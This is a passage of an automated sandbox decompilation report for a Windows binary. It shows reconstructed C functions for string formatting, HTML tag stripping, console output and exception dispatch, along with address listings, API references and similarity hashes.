										 *((char*)(_t240 + 0x2105)) = 1;
										goto L94;
									}
									if(_t330 != 1) {
										goto L94;
									}
									_t340 = _t247;
									if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t315 + 0x18)) - _t313 == 1) {
										_t340 = _t247 + 1;
									}
									_t334 = _t240 + 0x1028;
									E00C620BD(_t334, _t340);
									_push(_t340);
									_push( *_t334);
									goto L37;
								}
							} else {
								L94:
								_t248 = _a8;
								 *(_t315 + 0x1c) = _t248;
								_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t248;
								if(_t135 >= 2) {
									continue;
								}
								break;
							}
						}
					}
				}
			}

0x00c62210
0x00c62215
0x00c6221b
0x00c62222
0x00c62229
0x00c62233
0x00c62862
0x00c62868
0x00c62868
0x00c62241
0x00c62244
0x00c6224b
0x00c62254
0x00c62256
0x00c6225b
0x00c6225d
0x00c6225f
0x00000000
0x00000000
0x00c62272
0x00c62275
0x00c62277
0x00000000
0x00000000
0x00c6227d
0x00c6227f
0x00000000
0x00c6228f
0x00c62294
0x00c62298
0x00c6229d
0x00c6229f
0x00c622a1
0x00c622a7
0x00c622ae
0x00c622b2
0x00c622bf
0x00c622c2
0x00c622c7
0x00c622cd
0x00c622d1
0x00c622da
0x00c622dc
0x00c622ec
0x00c622ee
0x00c622f1
0x00c622f1
0x00c622f4
0x00c622f4
0x00c622fa
0x00c622fe
0x00c62307
0x00c62309
0x00c62319
0x00c6231b
0x00c6231e
0x00c6231e
0x00c62307
0x00c62321
0x00c62325
0x00c62325
0x00c6232d
0x00c62339
0x00c6233b
0x00000000
0x00c6234c
0x00c6234c
0x00c6234f
0x00c626f3
0x00c626f8
0x00c626fa
0x00c6272a
0x00c62738
0x00c62740
0x00c6274b
0x00c6274e
0x00c62754
0x00c62757
0x00c62766
0x00c62773
0x00c6277b
0x00c6277b
0x00c6278b
0x00c6279b
0x00c627a0
0x00c627a7
0x00c627af
0x00c627b8
0x00c627c6
0x00c627d0
0x00c627d5
0x00c627d7
0x00c627dc
0x00c627dd
0x00c627e6
0x00c627ec
0x00c627fd
0x00c62802
0x00c62807
0x00c6280b
0x00c6280f
0x00c62815
0x00c6281f
0x00c62824
0x00c62827
0x00c62829
0x00c6282b
0x00c6282b
0x00c62829
0x00c62815
0x00c62831
0x00c62838
0x00c62842
0x00c626fc
0x00c62709
0x00c62716
0x00c6271e
0x00c6271e
0x00000000
0x00c626fa
0x00c62355
0x00c62358
0x00c626cc
0x00c626d1
0x00c626d3
0x00000000
0x00000000
0x00c626d9
0x00c626e1
0x00c626eb
0x00c623ad
0x00c623af
0x00000000
0x00c623af
0x00c6235e
0x00c62361
0x00c62556
0x00c62559
0x00000000
0x00000000
0x00c62561
0x00c62566
0x00c6256a
0x00c6256c
0x00c62572
0x00c62576
0x00c62576
0x00c62579
0x00c6257d
0x00c6257f
0x00c62581
0x00c62583
0x00c625a7
0x00c62585
0x00c62593
0x00c62593
0x00c625ac
0x00c625b0
0x00c625b0
0x00c625b4
0x00c625b4
0x00c625b7
0x00c625bb
0x00c625bd
0x00c625c3
0x00c625c5
0x00c625c7
0x00c625e3
0x00c625c9
0x00c625d3
0x00c625d3
0x00c625c7
0x00c625e8
0x00c625ee
0x00c625ee
0x00c625f1
0x00c625f5
0x00c6262e
0x00c62633
0x00000000
0x00000000
0x00000000
0x00c625f7
0x00c625f7
0x00c625fc
0x00c62602
0x00c62604
0x00c62624
0x00000000
0x00c62624
0x00c62610
0x00c62615
0x00c62639
0x00c62639
0x00c6263b
0x00c62641
0x00c62646
0x00c6266f
0x00c62674
0x00c62648
0x00c6264a
0x00c6264f
0x00c62654
0x00c62659
0x00c6265b
0x00c6265d
0x00c62668
0x00c62668
0x00c6265d
0x00c62679
0x00c6267e
0x00c62687
0x00c62689
0x00c6268b
0x00c62696
0x00c62696
0x00c6268b
0x00c6269b
0x00c626a0
0x00c626ad
0x00c626af
0x00c626b1
0x00c626c0
0x00c626c0
0x00c626b1
0x00c626a0
0x00000000
0x00c6263b
0x00c625f5
0x00c62367
0x00c6236a
0x00c62503
0x00c62506
0x00c6250e
0x00c6251a
0x00c6251c
0x00c6252c
0x00c62536
0x00c6253b
0x00c6254c
0x00c6254c
0x00c6251c
0x00000000
0x00c62506
0x00c62370
0x00c62373
0x00c6248e
0x00c6249d
0x00c624a8
0x00c624aa
0x00c624b2
0x00c624b8
0x00c624c5
0x00c624ca
0x00c624ca
0x00c624e0
0x00c624e5
0x00c624f0
0x00c624f8
0x00c624f9
0x00000000
0x00c624f9
0x00c62379
0x00c6237c
0x00c623bb
0x00c623c2
0x00c623c9
0x00c623d2
0x00c623e0
0x00c623e6
0x00c623ed
0x00c623f1
0x00c623f3
0x00c623fc
0x00c62403
0x00c62405
0x00c62407
0x00c62407
0x00c6240d
0x00c62412
0x00c62416
0x00c62416
0x00c6241e
0x00c62420
0x00c62429
0x00c62430
0x00c62432
0x00c62434
0x00c62434
0x00c62440
0x00c62445
0x00c62445
0x00c6244d
0x00c62454
0x00c6245d
0x00c6245d
0x00c62463
0x00c6246a
0x00c62473
0x00c62473
0x00c62479
0x00000000
0x00c62479
0x00c62381
0x00000000
0x00000000
0x00c6238b
0x00c6238d
0x00c62399
0x00c62399
0x00c6239c
0x00c623a5
0x00c623aa
0x00c623ab
0x00000000
0x00c623ab
0x00c62849
0x00c62849
0x00c62849
0x00c6284d
0x00c62853
0x00c62858
0x00000000
0x00000000
0x00000000
0x00c62858
0x00c6232d
0x00c6227f
0x00c62860

APIs

_swprintf.LIBCMT ref: 00C62536

Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5

Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0

Strings

;%u, xrefs: 00C62523
x%u, xrefs: 00C626FD
xc%u, xrefs: 00C6275A

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 73cec2f857905cb34a91e58ef25109683aa02007981b65f443feb8ad99a4a8a5
Instruction ID: 59445f2d6535e773715642782e3d03de4f369321151bacd05fa2416a1d324e9f
Opcode Fuzzy Hash: 73cec2f857905cb34a91e58ef25109683aa02007981b65f443feb8ad99a4a8a5
Instruction Fuzzy Hash: 52F144716087409BCB35EF2888D5BFE77996F94300F08456DFDDA9B283CB248A49C762

Uniqueness

Uniqueness Score: -1.00%

Function 00C79CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00C79CFE(void* __eflags, signed short* _a4) {
				signed int* _v4;
				intOrPtr _v8;
				void* __ecx;
				signed int* _t17;
				signed int _t18;
				void* _t21;
				void* _t22;
				void* _t24;
				signed short _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed short* _t29;
				void* _t30;
				signed int _t31;
				signed int _t32;
				void* _t33;
				signed int _t36;
				void* _t38;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed short _t45;
				signed int _t47;
				short _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed short* _t53;
				signed int* _t55;
				short* _t56;
				short* _t57;
				signed short* _t58;
				signed int* _t59;
				intOrPtr _t60;
				signed int* _t77;

				_t58 = _a4;
				_push(2 + E00C83E13(_t58) * 2);
				_t17 = E00C83E33(_t38);
				_t59 = _t17;
				_v4 = _t59;
				if(_t59 == 0) {
					return _t17;
				}
				_t18 = E00C795AA(_t58);
				_t42 =  *_t58 & 0x0000ffff;
				_t36 = _t18;
				_t55 = _t59;
				if(_t42 == 0) {
					L47:
					return _t59;
				} else {
					_push(0xd);
					_push(0x20);
					_v8 = 0x3e;
					do {
						_t43 = _t42 & 0x0000ffff;
						while(_t43 != 0x3c) {
							if(_t36 == 0) {
								L11:
								_t36 = 0;
								__eflags = 0;
								if(0 == 0) {
									L20:
									_t27 =  *_t58 & 0x0000ffff;
									__eflags = _t27;
									if(__eflags == 0) {
										L27:
										_t28 =  *_t58 & 0x0000ffff;
										_t52 = 0x20;
										_t43 = _t28;
										_t72 = _t28;
										_t26 = 0xd;
										if(_t28 != 0) {
											continue;
										}
										break;
									}
									__eflags = _t27 - _t52;
									if(__eflags != 0) {
										L24:
										 *_t55 = _t27;
										L25:
										_t55 =  &(_t55[0]);
										L26:
										_t58 =  &(_t58[1]);
										goto L27;
									}
									__eflags = _t55 - _t59;
									if(__eflags == 0) {
										goto L24;
									}
									__eflags =  *((intOrPtr*)(_t55 - 2)) - _t52;
									if(__eflags == 0) {
										goto L26;
									}
									goto L24;
								}
								__eflags = _t43 - 0x26;
								if(_t43 != 0x26) {
									goto L20;
								}
								_t29 = 0;
								__eflags = 0;
								do {
									_t53 = _t29 + _t58;
									_t47 =  *_t53 & 0x0000ffff;
									__eflags = _t47;
									if(_t47 == 0) {
										break;
									}
									__eflags = _t47 - 0x3b;
									if(_t47 == 0x3b) {
										_t8 =  &(_t53[1]); // 0x22
										_t58 = _t8;
										_t36 = 1;
									}
									_t29 = _t29 + 2;
									__eflags = _t29 - 0x28;
								} while (_t29 < 0x28);
								__eflags = _t36;
								if(__eflags != 0) {
									goto L27;
								}
								_t52 = 0x20;
								goto L20;
							}
							if(_t43 == _t26) {
								L8:
								if(_t55 == _t59 ||  *((intOrPtr*)(_t55 - 2)) != _t52) {
									 *_t55 = _t52;
									goto L25;
								} else {
									goto L26;
								}
							}
							_t30 = 0xa;
							if(_t43 != _t30) {
								goto L11;
							}
							goto L8;
						}
						_t21 = E00C71FDD(_t72, _t58, L"</p>", 4);
						_t36 = _t36 & 0xffffff00 | _t21 == 0x00000000;
						_t74 = _t21;
						if(_t21 == 0 || E00C71FDD(_t74, _t58, L"<br>", 4) == 0) {
							_t44 = 0xd;
							_t22 = 2;
							 *_t55 = _t44;
							_t56 = _t55 + _t22;
							_t49 = 0xa;
							 *_t56 = _t49;
							_t55 = _t56 + _t22;
							if(_t36 != 0) {
								 *_t55 = _t44;
								_t57 = _t55 + _t22;
								 *_t57 = _t49;
								_t55 = _t57 + _t22;
								_t77 = _t55;
							}
						}
						 *_t55 = 0;
						_t24 = E00C71FDD(_t77, _t58, L"<style>", 7);
						_t45 =  *_t58 & 0x0000ffff;
						_t50 = _t45;
						if(_t24 != 0) {
							_t51 = _t45;
							__eflags = _t45;
							if(_t45 == 0) {
								L44:
								_t25 = _t51 & 0x0000ffff;
								__eflags = _t51 - _v8;
								if(__eflags == 0) {
									_t58 =  &(_t58[1]);
									__eflags = _t58;
									_t25 =  *_t58 & 0x0000ffff;
								}
								goto L46;
							}
							_t60 = _v8;
							while(1) {
								_t51 = _t45 & 0x0000ffff;
								__eflags = _t45 - _t60;
								if(_t45 == _t60) {
									break;
								}
								_t58 =  &(_t58[1]);
								_t31 =  *_t58 & 0x0000ffff;
								_t45 = _t31;
								_t51 = _t31;
								__eflags = _t31;
								if(_t31 != 0) {
									continue;
								}
								break;
							}
							_t59 = _v4;
							goto L44;
						} else {
							_t32 = _t50;
							_t79 = _t45;
							if(_t45 == 0) {
								L38:
								_t25 = _t32 & 0x0000ffff;
								goto L46;
							} else {
								goto L34;
							}
							while(1) {
								L34:
								_t33 = E00C71FDD(_t79, _t58, L"</style>", 8);
								_t58 =  &(_t58[1]);
								if(_t33 == 0) {
									break;
								}
								_t32 =  *_t58 & 0x0000ffff;
								if(_t32 != 0) {
									continue;
								}
								goto L38;
							}
							_t58 =  &(_t58[7]);
							__eflags = _t58;
							_t32 =  *_t58 & 0x0000ffff;
							goto L38;
						}
						L46:
						_t52 = 0x20;
						_t42 = _t25 & 0x0000ffff;
						_t26 = 0xd;
					} while (_t25 != 0);
					goto L47;
				}
			}

0x00c79d02
0x00c79d16
0x00c79d17
0x00c79d1c
0x00c79d1e
0x00c79d26
0x00c79ecb
0x00c79ecb
0x00c79d30
0x00c79d35
0x00c79d38
0x00c79d3a
0x00c79d3f
0x00c79ec3
0x00000000
0x00c79d45
0x00c79d45
0x00c79d48
0x00c79d4b
0x00c79d53
0x00c79d53
0x00c79d56
0x00c79d62
0x00c79d80
0x00c79d80
0x00c79d82
0x00c79d84
0x00c79db2
0x00c79db2
0x00c79db5
0x00c79db8
0x00c79dd2
0x00c79dd2
0x00c79dd7
0x00c79dda
0x00c79ddc
0x00c79ddf
0x00c79de0
0x00000000
0x00000000
0x00000000
0x00c79de0
0x00c79dba
0x00c79dbd
0x00c79dc9
0x00c79dc9
0x00c79dcc
0x00c79dcc
0x00c79dcf
0x00c79dcf
0x00000000
0x00c79dcf
0x00c79dbf
0x00c79dc1
0x00000000
0x00000000
0x00c79dc3
0x00c79dc7
0x00000000
0x00000000
0x00000000
0x00c79dc7
0x00c79d86
0x00c79d8a
0x00000000
0x00000000
0x00c79d8c
0x00c79d8c
0x00c79d8e
0x00c79d8e
0x00c79d91
0x00c79d94
0x00c79d97
0x00000000
0x00000000
0x00c79d99
0x00c79d9c
0x00c79d9e
0x00c79d9e
0x00c79da1
0x00c79da1
0x00c79da3
0x00c79da6
0x00c79da6
0x00c79dab
0x00c79dad
0x00000000
0x00000000
0x00c79db1
0x00000000
0x00c79db1
0x00c79d67
0x00c79d71
0x00c79d73
0x00c79d7b
0x00000000
0x00000000
0x00000000
0x00000000
0x00c79d73
0x00c79d6b
0x00c79d6f
0x00000000
0x00000000
0x00000000
0x00c79d6f
0x00c79dee
0x00c79df5
0x00c79df8
0x00c79dfa
0x00c79e0f
0x00c79e12
0x00c79e13
0x00c79e16
0x00c79e1a
0x00c79e1b
0x00c79e1e
0x00c79e22
0x00c79e24
0x00c79e27
0x00c79e29
0x00c79e2c
0x00c79e2c
0x00c79e2c
0x00c79e22
0x00c79e38
0x00c79e3b
0x00c79e40
0x00c79e43
0x00c79e47
0x00c79e7b
0x00c79e7d
0x00c79e80
0x00c79ea1
0x00c79ea1
0x00c79ea4
0x00c79ea9
0x00c79eab
0x00c79eab
0x00c79eae
0x00c79eae
0x00000000
0x00c79ea9
0x00c79e82
0x00c79e86
0x00c79e86
0x00c79e89
0x00c79e8c
0x00000000
0x00000000
0x00c79e8e
0x00c79e91
0x00c79e94
0x00c79e96
0x00c79e98
0x00c79e9b
0x00000000
0x00000000
0x00000000
0x00c79e9b
0x00c79e9d
0x00000000
0x00c79e49
0x00c79e49
0x00c79e4b
0x00c79e4e
0x00c79e76
0x00c79e76
0x00000000
0x00000000
0x00000000
0x00000000
0x00c79e50
0x00c79e50
0x00c79e58
0x00c79e5d
0x00c79e62
0x00000000
0x00000000
0x00c79e64
0x00c79e6c
0x00000000
0x00000000
0x00000000
0x00c79e6e
0x00c79e70
0x00c79e70
0x00c79e73
0x00000000
0x00c79e73
0x00c79eb1
0x00c79eb3
0x00c79eb6
0x00c79ebc
0x00c79ebc
0x00000000
0x00c79d53

APIs

_wcslen.LIBCMT ref: 00C79D0A

Strings

</p>, xrefs: 00C79DE8
<br>, xrefs: 00C79DFE
>, xrefs: 00C79D4B
<style>, xrefs: 00C79E30
</style>, xrefs: 00C79E52

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 7e2b6854024199d2f6eb6f9da685b048e95a7e2bc9412e7c63c91f59db583699
Instruction ID: 6484aa97358f0687f93ac9833b4c431ed022fbf42cde590d40f609f75234f25f
Opcode Fuzzy Hash: 7e2b6854024199d2f6eb6f9da685b048e95a7e2bc9412e7c63c91f59db583699
Instruction Fuzzy Hash: 8C51F86674032395DB309A699822B7673E1DFB1750F68C42BFDD98B2C0FB758E818261

Uniqueness

Uniqueness Score: -1.00%

Function 00C8F68D Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00C8F68D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t115;
				signed int _t117;
				signed char _t122;
				signed char _t127;
				signed int _t128;
				signed char* _t129;
				intOrPtr* _t130;
				signed int _t131;
				void* _t132;

				_t78 =  *0xc9e7ac; // 0x2b9f4dac
				_v8 = _t78 ^ _t131;
				_t80 = _a8;
				_t117 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t129 = _a12;
				_v52 = _t129;
				_v48 = _t117;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xcc2290 + _t117 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t129;
				_t86 = GetConsoleCP();
				_t130 = _a4;
				_v60 = _t86;
				 *_t130 = 0;
				 *((intOrPtr*)(_t130 + 4)) = 0;
				 *((intOrPtr*)(_t130 + 8)) = 0;
				while(_t129 < _v40) {
					_v28 = 0;
					_v31 =  *_t129;
					_t128 =  *(0xcc2290 + _v48 * 4);
					_t122 =  *(_t128 + _t115 + 0x2d);
					if((_t122 & 0x00000004) == 0) {
						_t92 = E00C8A767(_t115, _t128);
						_t128 = 0x8000;
						if(( *(_t92 + ( *_t129 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t129);
							goto L8;
						} else {
							if(_t129 >= _v40) {
								_t128 = _v48;
								 *((char*)( *((intOrPtr*)(0xcc2290 + _t128 * 4)) + _t115 + 0x2e)) =  *_t129;
								 *( *((intOrPtr*)(0xcc2290 + _t128 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0xcc2290 + _t128 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
							} else {
								_t112 = E00C8930D( &_v28, _t129, 2);
								_t132 = _t132 + 0xc;
								if(_t112 != 0xffffffff) {
									_t129 =  &(_t129[1]);
									goto L9;
								}
							}
						}
					} else {
						_t127 = _t122 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
						_push(2);
						_v15 = _t127;
						 *(_t128 + _t115 + 0x2d) = _t127;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00C8930D();
						_t132 = _t132 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t129 =  &(_t129[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t130 = GetLastError();
								} else {
									_t48 = _t130 + 8; // 0xff76e900
									 *((intOrPtr*)(_t130 + 4)) =  *_t48 - _v52 + _t129;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t130 + 8)) =  *((intOrPtr*)(_t130 + 8)) + 1;
													 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00C7FBBC(_t130, _t115, _v8 ^ _t131, _t128, _t129, _t130);
			}

0x00c8f695
0x00c8f69c
0x00c8f69f
0x00c8f6a7
0x00c8f6ab
0x00c8f6b7
0x00c8f6ba
0x00c8f6bd
0x00c8f6c4
0x00c8f6cc
0x00c8f6cf
0x00c8f6d5
0x00c8f6db
0x00c8f6e0
0x00c8f6e2
0x00c8f6e5
0x00c8f6ea
0x00c8f6f4
0x00c8f6fb
0x00c8f6fe
0x00c8f705
0x00c8f70c
0x00c8f727
0x00c8f72f
0x00c8f738
0x00c8f75e
0x00c8f760
0x00000000
0x00c8f73a
0x00c8f73d
0x00c8f804
0x00c8f810
0x00c8f81b
0x00c8f820
0x00c8f743
0x00c8f74a
0x00c8f74f
0x00c8f755
0x00c8f75b
0x00000000
0x00c8f75b
0x00c8f755
0x00c8f73d
0x00c8f70e
0x00c8f712
0x00c8f715
0x00c8f71b
0x00c8f71d
0x00c8f720
0x00c8f724
0x00c8f761
0x00c8f764
0x00c8f765
0x00c8f76a
0x00c8f770
0x00c8f776
0x00c8f785
0x00c8f78b
0x00c8f791
0x00c8f796
0x00c8f7b2
0x00c8f825
0x00c8f82b
0x00c8f7b4
0x00c8f7b4
0x00c8f7bc
0x00c8f7c5
0x00c8f7cb
0x00000000
0x00c8f7cd
0x00c8f7cf
0x00c8f7d2
0x00c8f7eb
0x00000000
0x00c8f7ed
0x00c8f7f1
0x00c8f7f3
0x00c8f7f6
0x00000000
0x00c8f7f6
0x00c8f7f1
0x00c8f7eb
0x00c8f7cb
0x00c8f7c5
0x00c8f7b2
0x00c8f796
0x00c8f770
0x00000000
0x00c8f7f9
0x00c8f7f9
0x00c8f82d
0x00c8f83f

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00C8FE02,00000000,00000000,00000000,00000000,00000000,00C8529F), ref: 00C8F6CF
__fassign.LIBCMT ref: 00C8F74A
__fassign.LIBCMT ref: 00C8F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00C8F78B
WriteFile.KERNEL32(?,00000000,00000000,00C8FE02,00000000,?,?,?,?,?,?,?,?,?,00C8FE02,00000000), ref: 00C8F7AA
WriteFile.KERNEL32(?,00000000,00000001,00C8FE02,00000000,?,?,?,?,?,?,?,?,?,00C8FE02,00000000), ref: 00C8F7E3

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 61af431416f996a76de6929a76b5440599013c232204f5dd58b7e034450daab2
Instruction ID: 36a820618bf014f832c8880150d2af72c3947845e5cccb9b3982b3e9a4fff3e7
Opcode Fuzzy Hash: 61af431416f996a76de6929a76b5440599013c232204f5dd58b7e034450daab2
Instruction Fuzzy Hash: 1651C4B19002499FDB10DFA8DC85BEEBBF4EF09314F14416EE551E7291D770AA42CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C82900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00C82900(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E00C92567(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0xc9e7ac;
				E00C828C0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0xc9e7ac);
				E00C8396C(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E00C83AF0(_t77, 0xfffffffe, _t96, 0xc9e7ac);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E00C83A90(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E00C828C0(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0xc958dc;
											if(__eflags != 0) {
												_t72 = E00C92090(__eflags, 0xc958dc);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0xc958dc; // 0xc80150
													 *0xc93278(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E00C83AD0(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E00C83AF0(_t64, _t93, _t96, 0xc9e7ac);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E00C828C0(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E00C83AB0();
										asm("int3");
										__eflags = E00C83B07();
										if(__eflags != 0) {
											_t67 = E00C82B8C(_t86, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E00C83B43();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x00c82900
0x00c82907
0x00c8290b
0x00c8290c
0x00c82912
0x00c8291e
0x00c82920
0x00c82926
0x00c82926
0x00c8292f
0x00c82931
0x00c82934
0x00c82937
0x00c8293f
0x00c82944
0x00c82947
0x00c8294a
0x00c82951
0x00c829ad
0x00c829b0
0x00c829b8
0x00c829bf
0x00000000
0x00c829bf
0x00000000
0x00c82953
0x00c82953
0x00c82959
0x00c8295f
0x00c82965
0x00c829d0
0x00c829d9
0x00c82967
0x00c82967
0x00c82967
